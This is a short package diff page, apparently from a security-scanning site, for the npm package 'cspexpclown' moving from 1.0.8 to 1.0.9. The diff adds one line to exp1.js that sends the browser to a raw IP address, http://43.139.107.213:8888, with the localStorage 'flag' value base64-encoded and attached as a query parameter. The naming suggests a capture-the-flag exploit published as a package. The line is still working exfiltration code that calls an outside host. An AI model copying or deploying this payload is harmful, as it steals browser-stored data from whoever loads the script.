cspexpclown 1.0.8 → 1.0.9
Sign up to get free protection for your applications and to get access to all the features.
- package/exp.js +1 -1
- package/exp1.js +1 -1
- package/package.json +1 -1
package/exp.js
CHANGED
package/exp1.js
CHANGED
@@ -1 +1 @@
|
|
1
|
-
window.location.href="
|
1
|
+
window.location.href="http://43.139.107.213:8888/?flag="+encodeURIComponent(btoa(localStorage.getItem("flag")));
|